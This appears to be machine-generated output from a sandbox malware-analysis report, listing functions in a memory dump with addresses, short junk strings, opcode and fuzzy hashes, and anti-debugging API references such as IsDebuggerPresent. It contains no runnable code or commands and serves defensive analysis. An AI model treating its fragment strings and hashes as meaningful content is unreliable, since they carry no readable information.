Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -J$9?$NBD$NBD$P^$Sz$Vf.
API String ID: 0-1644255200
Opcode ID: 8a9a26b8636b9861aafc6bde98f5ba73e2ff97cec7b804446af357f714f315eb
Instruction ID: 6215c7d171798c9939febcd19912d38c8e8c8c9c82bdc4a4d57760e6fe8a88d1
Opcode Fuzzy Hash: 8a9a26b8636b9861aafc6bde98f5ba73e2ff97cec7b804446af357f714f315eb
Instruction Fuzzy Hash: ADE121B15083819FC3A8CF25D98A60BFBF1FBD4348F508A1CF59986260D7B48949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00A7473A, Relevance: 9.0, Strings: 7, Instructions: 261COMMON

Download Yara Rule

Strings

-a(, xrefs: 00A74A06
@#, xrefs: 00A749BC
D, xrefs: 00A74B45
G&, xrefs: 00A74AE9
|p, xrefs: 00A748F2
@I, xrefs: 00A74A6E
aA]<, xrefs: 00A74816

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -a($@#$@I$D$G&$aA]<$|p
API String ID: 0-3359372099
Opcode ID: f090e7079fd609f76dc49d42f5cabf8cf1b40299d4d3d0c715cb4fbf1c6724d7
Instruction ID: 3ccb3fe7931677633931fbbc7a20dc1277de44206f6bcef50819b3d91306216c
Opcode Fuzzy Hash: f090e7079fd609f76dc49d42f5cabf8cf1b40299d4d3d0c715cb4fbf1c6724d7
Instruction Fuzzy Hash: F3C1FF725083809FD368CF25C94A91BFBF2BBC5748F508A1DF29596261D3B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A704A4, Relevance: 9.0, Strings: 7, Instructions: 202COMMON

Download Yara Rule

Strings

H}B, xrefs: 00A7062E
}', xrefs: 00A707D6
', xrefs: 00A706CB
4t, xrefs: 00A7051F
}', xrefs: 00A7070A
LH, xrefs: 00A7055B
}', xrefs: 00A7080A

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 4t$H}B$LH$}'$}'$}'$'
API String ID: 0-3450385318
Opcode ID: 96a5c27af8950976a159766323a046c2322f77c068b3d44fb4c29c1036d2edf8
Instruction ID: af9473f72eb6fccda9712380429706dfbcb6a46e6a048b0ca886bd315042b10f
Opcode Fuzzy Hash: 96a5c27af8950976a159766323a046c2322f77c068b3d44fb4c29c1036d2edf8
Instruction Fuzzy Hash: F0911F726093409FC358CF65D98A81BFBF2FBC8748F108A0DF19986260D7B19A488F46

Uniqueness

Uniqueness Score: -1.00%

Function 00A7604E, Relevance: 9.0, Strings: 7, Instructions: 201COMMON

Download Yara Rule

Strings

9,|, xrefs: 00A76117
T5(, xrefs: 00A761E9
?)U8, xrefs: 00A76223
hEG, xrefs: 00A7606B
'%,, xrefs: 00A760DF
6"-, xrefs: 00A7618A
fm>, xrefs: 00A76110

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: '%,$6"-$9,|$?)U8$T5($fm>$hEG
API String ID: 0-4282948982
Opcode ID: 97228ab59ed9630f98e9f0e5e78fbbfcc72a5cdc37ae4c889db6885b95efb7da
Instruction ID: 6b3befdcf7101df6cc2bd7a728edec19c04856822e26004449f48bda589f10b0
Opcode Fuzzy Hash: 97228ab59ed9630f98e9f0e5e78fbbfcc72a5cdc37ae4c889db6885b95efb7da
Instruction Fuzzy Hash: B1A10FB5D0121CEBDF08CFE5D98A8DEBBB2FB48304F20815AE416BA250D7B51A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A73130, Relevance: 7.9, Strings: 6, Instructions: 386COMMON

Download Yara Rule

Strings

c/, xrefs: 00A733C2
BD, xrefs: 00A73498
{d, xrefs: 00A732BA
-o, xrefs: 00A73472
z, xrefs: 00A7332B
7]bM, xrefs: 00A73313

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: BD$-o$7]bM$c/${d$z
API String ID: 0-1369920251
Opcode ID: 0978cbd6e6b2e58b4b5b5a330a28090e9600e36508660258ce69f92898b9e1cc
Instruction ID: 3e1cff9c3e5c2b0732306b79612e71da18573782f52a87eeea91ee1eb19c92fe
Opcode Fuzzy Hash: 0978cbd6e6b2e58b4b5b5a330a28090e9600e36508660258ce69f92898b9e1cc
Instruction Fuzzy Hash: EF1232729083809FD768DF24C98AA4BFBF2BBC4744F10891DE5DA86260D7B58949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A6B12E, Relevance: 7.8, Strings: 6, Instructions: 313COMMON

Download Yara Rule

Strings

TY, xrefs: 00A6B484
%r7, xrefs: 00A6B2CD
v', xrefs: 00A6B5EB
qt, xrefs: 00A6B2DE
SG#, xrefs: 00A6B1F4
6m%, xrefs: 00A6B375

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %r7$6m%$SG#$TY$qt$v'
API String ID: 0-3237691032
Opcode ID: c11806bc8cac9c3ba9f03b543c8f0b2e4bf678ab34cfa4a85c1f858d16abfb64
Instruction ID: c64671663fcdbe99f319fb83efa2185631238e4a2f3c64cb708fb24558b4a07e
Opcode Fuzzy Hash: c11806bc8cac9c3ba9f03b543c8f0b2e4bf678ab34cfa4a85c1f858d16abfb64
Instruction Fuzzy Hash: FCF10FB14083809FD369DF61C98AA5BBBF1BBC1748F10891CF2DA86260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A6D899, Relevance: 7.8, Strings: 6, Instructions: 266COMMON

Download Yara Rule

Strings

&hL, xrefs: 00A6DCAC
'Q-, xrefs: 00A6D90E
E_g, xrefs: 00A6D92E
&hL, xrefs: 00A6DCEB
bf, xrefs: 00A6DAD5
2Kz, xrefs: 00A6DA2E

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &hL$&hL$'Q-$2Kz$E_g$bf
API String ID: 0-3327759155
Opcode ID: 818fcac5b5801ca78e024e69867041b2eb9182ed99eaae261f8d373ea8ec87c4
Instruction ID: 3b3321751d6a98d63b016d16bf082893fe7b9197f6bc7528e5cfba13429548a1
Opcode Fuzzy Hash: 818fcac5b5801ca78e024e69867041b2eb9182ed99eaae261f8d373ea8ec87c4
Instruction Fuzzy Hash: FFC13372A097418FC368DF25D58940BBBF1BBC4748F208A2DF5959A260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A7BA18, Relevance: 7.8, Strings: 6, Instructions: 254COMMON

Download Yara Rule

Strings

OY<, xrefs: 00A7BC8E
XF, xrefs: 00A7BB01
DF`, xrefs: 00A7BA30
OE, xrefs: 00A7BBBA
j,r), xrefs: 00A7BCEB
Wv, xrefs: 00A7BADC

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: OE$OY<$Wv$XF$j,r)$DF`
API String ID: 0-3120813865
Opcode ID: 1d1e6617eeb99c049403a036c2c4b5a4d0456658fc19016faf296689b6c0750a
Instruction ID: 70127288887682b77c038b21c2b9d3d6cd50109f390d02d1ddacd16b5f81c768
Opcode Fuzzy Hash: 1d1e6617eeb99c049403a036c2c4b5a4d0456658fc19016faf296689b6c0750a
Instruction Fuzzy Hash: 8CC132B25083419FD398CF65C98A94BFBF1FBC4748F10891DF5A68A260D7B59909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E7DA, Relevance: 7.8, Strings: 6, Instructions: 253COMMON

Download Yara Rule

Strings

|, xrefs: 00A7E978
vtc, xrefs: 00A7E990
"E), xrefs: 00A7E9B1
X(, xrefs: 00A7EB02
~Mj, xrefs: 00A7EA7E
Ti, xrefs: 00A7E85F

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "E)$Ti$X($vtc$|$~Mj
API String ID: 0-2927301414
Opcode ID: 3d8ec008e6dc49c306694b80d1cb3fa0644b027db4ae6c0dfe7877f2034c749e
Instruction ID: 654d3c474fbe368b22d2c7ad4c25b2ca6e39dbe3effac174fa44f1dadfef17d8
Opcode Fuzzy Hash: 3d8ec008e6dc49c306694b80d1cb3fa0644b027db4ae6c0dfe7877f2034c749e
Instruction Fuzzy Hash: 79C132729083409FD368CF65C98990BFBF2BBC8758F108A1DF59A96260D3B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A70A37, Relevance: 7.8, Strings: 6, Instructions: 251COMMON

Download Yara Rule

Strings

~a, xrefs: 00A70BA0
0;, xrefs: 00A70BD8
8z, xrefs: 00A70D80
His, xrefs: 00A70AB2
8z, xrefs: 00A70A83
(TO, xrefs: 00A70B57

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (TO$0;$8z$8z$His$~a
API String ID: 0-2714135093
Opcode ID: df3878934ae7ed5ea030270df1f8f08988b6eeb6046ee7f2e8ef2026ca98c2c6
Instruction ID: caef1582c3dad875f7eab06f4244cbfc6803d81c49cb076384a7c63e734a7981
Opcode Fuzzy Hash: df3878934ae7ed5ea030270df1f8f08988b6eeb6046ee7f2e8ef2026ca98c2c6
Instruction Fuzzy Hash: F2C130724083849FD7A8CF65C98991BBBF1FBD4748F408A1DF69A86260D7B58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A6196D, Relevance: 7.7, Strings: 6, Instructions: 234COMMON

Download Yara Rule

Strings

I+C, xrefs: 00A61B36
i_Z, xrefs: 00A61B6B
Ht|, xrefs: 00A619FB
E5, xrefs: 00A61B09
\a, xrefs: 00A61B80
), xrefs: 00A61A56

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: )$E5$Ht|$I+C$\a$i_Z
API String ID: 0-3197448685
Opcode ID: 84ddc068174b7758b6c2da650eb2fc60a98c34efd77176af70ae57673f7355cc
Instruction ID: a89e94c56c97cda40d085294b6ef544524d1896c87d59e959a9c6591b8dfa04e
Opcode Fuzzy Hash: 84ddc068174b7758b6c2da650eb2fc60a98c34efd77176af70ae57673f7355cc
Instruction Fuzzy Hash: 42B110B28083418FC358CF65D58941BFFF1BBC4758F54892DF6A5A6260D3B18A49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00A75B7C, Relevance: 7.7, Strings: 6, Instructions: 228COMMON

Download Yara Rule

Strings

&?, xrefs: 00A75CA8
*ZV, xrefs: 00A75BE7
YY, xrefs: 00A75C77
l] , xrefs: 00A75D61
HU;, xrefs: 00A75DD5
,S, xrefs: 00A75B93

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &?$*ZV$,S$HU;$YY$l]
API String ID: 0-166477480
Opcode ID: 8379d690d42ec0717b2dc05813671df429d046ea21c66b5b0be9c591ecf28804
Instruction ID: e8755459d0f8ae2e16f855df113171bc034442babbf13d242973c527948d2613
Opcode Fuzzy Hash: 8379d690d42ec0717b2dc05813671df429d046ea21c66b5b0be9c591ecf28804
Instruction Fuzzy Hash: 49B12E72A097419FC364CF29C58580BFBF1BBC4758F108A2DF59996224D3B1CA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00A69565, Relevance: 7.7, Strings: 6, Instructions: 205COMMON

Download Yara Rule

Strings

L *, xrefs: 00A69794
t&, xrefs: 00A6970A
K}, xrefs: 00A6976B
`w, xrefs: 00A6972A
tV, xrefs: 00A696D5
p, xrefs: 00A69837

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: K}$L *$`w$t&$tV$p
API String ID: 0-1343311438
Opcode ID: 1a1ea3181f45ae815ac7c35573308f6755db258efa70edef87b81ce265f786f4
Instruction ID: 52848e6de81c2b0d9f0fa0a01514637101804917defb3941d979a51749da1e06
Opcode Fuzzy Hash: 1a1ea3181f45ae815ac7c35573308f6755db258efa70edef87b81ce265f786f4
Instruction Fuzzy Hash: F7A14FB2808381AFD798CF25D58A40BFBF1FB94758F009A1CF59596260D7B5DA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00A76B91, Relevance: 7.7, Strings: 6, Instructions: 152COMMON

Download Yara Rule

Strings

tLo, xrefs: 00A76D34
r, xrefs: 00A76D1F
fHB, xrefs: 00A76C96
-^, xrefs: 00A76CD3
l/, xrefs: 00A76C30
AV, xrefs: 00A76BFD

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -^$AV$fHB$l/$tLo$r
API String ID: 0-2229134097
Opcode ID: 1109ac0cbcc82784efd7e1d4772eb106e62b5a10dbee13f491f5e739d9affef7
Instruction ID: e0fd231d011bb62e91c6347002d697ba725aa0326df7b86737732bc63297ddaf
Opcode Fuzzy Hash: 1109ac0cbcc82784efd7e1d4772eb106e62b5a10dbee13f491f5e739d9affef7
Instruction Fuzzy Hash: 8E7130715083419FC358DF61C98A81BBFF1FBC4758F50992DF29A96260C3B58A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00A6FBEF, Relevance: 6.5, Strings: 5, Instructions: 278COMMON

Download Yara Rule

Strings

ED:, xrefs: 00A6FF9B
G~s, xrefs: 00A6FBF5
;, xrefs: 00A6FF36
y, xrefs: 00A6FC63
ge, xrefs: 00A70039

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ;$ED:$G~s$ge$y
API String ID: 0-4105283278
Opcode ID: 1ada23eedd561157385273cd1cec23d14920085fbe80740987abe5fcd9f5db43
Instruction ID: 8480c9f26a10a6a28c575ceb96a34580e263fdc9dd1d90ae29c22e40c56b21c7
Opcode Fuzzy Hash: 1ada23eedd561157385273cd1cec23d14920085fbe80740987abe5fcd9f5db43
Instruction Fuzzy Hash: B6E1FF715093809FD3A8CF26C98A60BFBF2FBC5708F508A0DE59996260D7B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00A6BEF5, Relevance: 6.5, Strings: 5, Instructions: 240COMMON

Download Yara Rule

Strings

>/f, xrefs: 00A6BF84
I, xrefs: 00A6C14F
oNL, xrefs: 00A6BEF8
", xrefs: 00A6C08D
ln, xrefs: 00A6BF02

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "$>/f$I$ln$oNL
API String ID: 0-652186313
Opcode ID: f4bb81614ca488d30612f3e1f05dad9f70125f90f2c4f190b3abe42e3bc6b404
Instruction ID: 74f97f72e74e29c5cd997923a685a0f140fef44c6c08494d64f632e758f7f13b
Opcode Fuzzy Hash: f4bb81614ca488d30612f3e1f05dad9f70125f90f2c4f190b3abe42e3bc6b404
Instruction Fuzzy Hash: FBC14FB14083818FC358CF65C59546BBBF1BBC9718F108A0DF5DA96260D3B8DA4ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 00A756A9, Relevance: 6.5, Strings: 5, Instructions: 217COMMON

Download Yara Rule

Strings

,d, xrefs: 00A75908
WQ, xrefs: 00A757BF
]t, xrefs: 00A758BD
(j], xrefs: 00A75722
W, xrefs: 00A756F5

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (j]$,d$WQ$W$]t
API String ID: 0-3511903769
Opcode ID: a1385fe8e248301dad6879d6d91dea4827c25ddcdc95f83659852dc9e4faf912
Instruction ID: cac1e077cf725dc9936a2a5de25182e3f756fd80cf11588955a04240ede50711
Opcode Fuzzy Hash: a1385fe8e248301dad6879d6d91dea4827c25ddcdc95f83659852dc9e4faf912
Instruction Fuzzy Hash: 27A132715087809FC358CF25C98A91BBBF1FBC4758F508A1DF69A9A260D3B5CA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00A6E336, Relevance: 6.5, Strings: 5, Instructions: 215COMMON

Download Yara Rule

Strings

y@ko, xrefs: 00A6E40B
Y1, xrefs: 00A6E43F
1, xrefs: 00A6E457
&", xrefs: 00A6E5B8
S3, xrefs: 00A6E4D8

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &"$S3$Y1$y@ko$1
API String ID: 0-1237345320
Opcode ID: 9c0ee166a0d573da2383d4e941f13942f6eb3f52a2fce6c77f87b5e0c06da37b
Instruction ID: 100c8accc92677b9be25ad24ebe8e1648f5abd062d449e234f6adce12aeba47c
Opcode Fuzzy Hash: 9c0ee166a0d573da2383d4e941f13942f6eb3f52a2fce6c77f87b5e0c06da37b
Instruction Fuzzy Hash: C5A14F765093419FD358CF61C58992BBBF2FBD8708F40892DF29A96260D3B1DA098F43

Uniqueness

Uniqueness Score: -1.00%

Function 00A806EF, Relevance: 6.5, Strings: 5, Instructions: 204COMMON

Download Yara Rule

Strings

Smq, xrefs: 00A80770
~V, xrefs: 00A80800
GDK, xrefs: 00A80825
`H*, xrefs: 00A8073E
XU~, xrefs: 00A8075B

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: GDK$Smq$XU~$`H*$~V
API String ID: 0-3650479097
Opcode ID: c567ba80173c02312879da60463322da737f8d1bc8f9a2772910c3847abd660a
Instruction ID: fe29a446c03fdc8b3525e1b96bc5c10fe9ead26ea5ca6c10a83fc03c522d10ca
Opcode Fuzzy Hash: c567ba80173c02312879da60463322da737f8d1bc8f9a2772910c3847abd660a
Instruction Fuzzy Hash: 73A1EF72500248EBDF59DFA5C94A9CE3BB1FF48358F108119FE2996260D3B6C959CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D10B, Relevance: 6.4, Strings: 5, Instructions: 200COMMON

Download Yara Rule

Strings

u'd, xrefs: 00A7D323
(1p, xrefs: 00A7D27C
2l, xrefs: 00A7D216
5EV~, xrefs: 00A7D15F
FnE, xrefs: 00A7D14F

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (1p$5EV~$FnE$u'd$2l
API String ID: 0-2267264843
Opcode ID: 6c39234ecaacde91e6e978347e5444df690c1755d40e69737174a6c9a30dc423
Instruction ID: 0752433f0f5b5cd50ffd087e74cfc2772add268cd8e4cfa844114684ed172500
Opcode Fuzzy Hash: 6c39234ecaacde91e6e978347e5444df690c1755d40e69737174a6c9a30dc423
Instruction Fuzzy Hash: 769133725083819BC358DF64C98A41BFBF2FBC4758F108A1DF18996220D7B6D958CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9D1CC, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EA9D1D8
IsDebuggerPresent.KERNEL32 ref: 6EA9D2A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EA9D2C4
UnhandledExceptionFilter.KERNEL32(?), ref: 6EA9D2CE

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 316ed41eb724a27abd2e4039a8fa45f8472c04a65a2764d8551d7466d33b747a
Instruction ID: 623c6cad2d6c4bf19cd9e1f1c53d013d4e38cfbdac3fb1489bc11f35418e43b2
Opcode Fuzzy Hash: 316ed41eb724a27abd2e4039a8fa45f8472c04a65a2764d8551d7466d33b747a
Instruction Fuzzy Hash: 143104759153199BDB11DFA4C989BCDBBF8AF08304F1080AAE40DAB240EB719AC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00A713DB, Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

=Lw, xrefs: 00A71974
=t[, xrefs: 00A714B2
g,0, xrefs: 00A71885
A{, xrefs: 00A7158E

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: =Lw$=t[$A{$g,0
API String ID: 0-3102551745
Opcode ID: 5affde47dcb869bd10e1f676d0411cfa7d2a5525a10c581b997b6ef6838920d9
Instruction ID: 605faec708b6b920a3469e7f33182ff3521a5d4141b722bcce4c182d5988a64d
Opcode Fuzzy Hash: 5affde47dcb869bd10e1f676d0411cfa7d2a5525a10c581b997b6ef6838920d9
Instruction Fuzzy Hash: 9C1200715083809FD368CF65C98AA9BFBE2FBC4758F10891DF29986260D7B48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C145, Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

.*&, xrefs: 00A7C15A
+M, xrefs: 00A7C240
Y\T, xrefs: 00A7C26E
u_T, xrefs: 00A7C355

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: +M$.*&$Y\T$u_T
API String ID: 0-2652214267
Opcode ID: 28f9e7f44a4f73741e92095ac6cef26fb6d28bc2974d6711f111ba723a450b85
Instruction ID: c02297519e7642ce32ff51ef310638f68e3197aa44867d497607cd1e9207b3c2
Opcode Fuzzy Hash: 28f9e7f44a4f73741e92095ac6cef26fb6d28bc2974d6711f111ba723a450b85
Instruction Fuzzy Hash: 8CB144B6D00309EBCB54CFE5C98AADEBBB0FF44314F208149E116BA290D3B41A49CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A668AD, Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

AZk, xrefs: 00A669F5
(P, xrefs: 00A6693D
C)/, xrefs: 00A66A46
Q5, xrefs: 00A66A6B

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: AZk$C)/$Q5$(P
API String ID: 0-3568429903
Opcode ID: 4f5247ff58d37919dde0014091b0176d3b6085f5b95e0dacd0acd0109bc31bfc
Instruction ID: 96a54033e7baabee3a214288fccd04f2156b78685603958148568b7b9fa0d13d
Opcode Fuzzy Hash: 4f5247ff58d37919dde0014091b0176d3b6085f5b95e0dacd0acd0109bc31bfc
Instruction Fuzzy Hash: 899101B2508380AFC358CF65C98690BFBF2BBC4754F409A1DF59996260D7BAD905CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00A77EDD, Relevance: 5.2, Strings: 4, Instructions: 160COMMON

Download Yara Rule

Strings

VXe, xrefs: 00A77F21
bQ, xrefs: 00A77FF5
Ge&, xrefs: 00A7800A
q;\, xrefs: 00A7809F

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Ge&$VXe$bQ$q;\
API String ID: 0-2640374020
Opcode ID: cc2a5a54575fbf300a3aebb8dccb6ac4b5d29b68b9b0ac915b38ada48fa4d047
Instruction ID: 22b781ecbf96faf33c1e943e46edc924619300a833ced7c8ade8c12e5724b896
Opcode Fuzzy Hash: cc2a5a54575fbf300a3aebb8dccb6ac4b5d29b68b9b0ac915b38ada48fa4d047
Instruction Fuzzy Hash: 2F615271109301AFC758DF20C98A41FBBE1FBD8758F508A1DF59AA6260D775CA49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00A61DF9, Relevance: 5.1, Strings: 4, Instructions: 146COMMON

Download Yara Rule

Strings

,\H, xrefs: 00A61FAE
af`, xrefs: 00A62056
c2O, xrefs: 00A61F52
,\H, xrefs: 00A62039

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ,\H$,\H$af`$c2O
API String ID: 0-3082886527
Opcode ID: 3bfb5e42cca4a70539c8f4188a6d54e0a7ec739cabc5743c37cdc03544baeb09
Instruction ID: 3c8a8f0c9047aa5c4dbf0c71d322b8d24d72af135fff266ab061c2e488b0e063
Opcode Fuzzy Hash: 3bfb5e42cca4a70539c8f4188a6d54e0a7ec739cabc5743c37cdc03544baeb09
Instruction Fuzzy Hash: A6517771608301CBC758CF29D58991FBBF1EBC8758F244A1EF196A62A0C370CA09CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00A835E3, Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

4`g, xrefs: 00A836FF
g6, xrefs: 00A83623
!#, xrefs: 00A8369C
%uG, xrefs: 00A83683

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %uG$4`g$g6$!#
API String ID: 0-3570404244
Opcode ID: 49efdd2581645fbbb63b707176fab2ea5744dfb9c626b487036a607583eb4737
Instruction ID: 18375b441a940cc859ba493c87c3c64251b9a02898b2e204e645ace6a15792c5
Opcode Fuzzy Hash: 49efdd2581645fbbb63b707176fab2ea5744dfb9c626b487036a607583eb4737
Instruction Fuzzy Hash: 855123B1C0131AABCF15CFA4DA4A4EEFBB0BB44718F208199C411B6250D3B45A49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A7CF2C, Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

9b', xrefs: 00A7CF35
(", xrefs: 00A7CF83
zL, xrefs: 00A7CF7B
q, xrefs: 00A7D02E

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: zL$("$9b'$q
API String ID: 0-871342943
Opcode ID: d58202ca7df7bc05c79e8fbda96cdac0ffd23f09c47f9b8b024468306da2de10
Instruction ID: 40e51aa4b4312935c6432470e86d65c4f862a3673368285aa28102ed8f4a26ed
Opcode Fuzzy Hash: d58202ca7df7bc05c79e8fbda96cdac0ffd23f09c47f9b8b024468306da2de10
Instruction Fuzzy Hash: A34147B25083019FC394CF20D68940BBBF1FBD4718F609A1DF48A96224D7B4DA0A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA29E6, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EAA2ADE
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EAA2AE8
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EAA2AF5

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ce9603bbdf1864266eb11c9fd65e6ed69021f5f055d391aae2ca2328b60817fb
Instruction ID: a0ed547f6c8195b777fc7d04d2d5e8bdf1497aa33e2a2b12fdaa6abacb8fbe0a
Opcode Fuzzy Hash: ce9603bbdf1864266eb11c9fd65e6ed69021f5f055d391aae2ca2328b60817fb
Instruction Fuzzy Hash: AB31C274911329ABCB61DF68C9887CCBBF8AF08310F5085EAE418A7250E7309BC59F58

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B0BA, Relevance: 4.2, Strings: 3, Instructions: 430COMMON

Download Yara Rule

Strings

, xrefs: 00A7B8D2
"pRk, xrefs: 00A7B62F
)dP, xrefs: 00A7B1D0

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $"pRk$)dP
API String ID: 0-4184037624
Opcode ID: 6ac0fe42bcd2ce2da81b2a65f90b84b19e729091e40ced8172263e78d30f7bb4
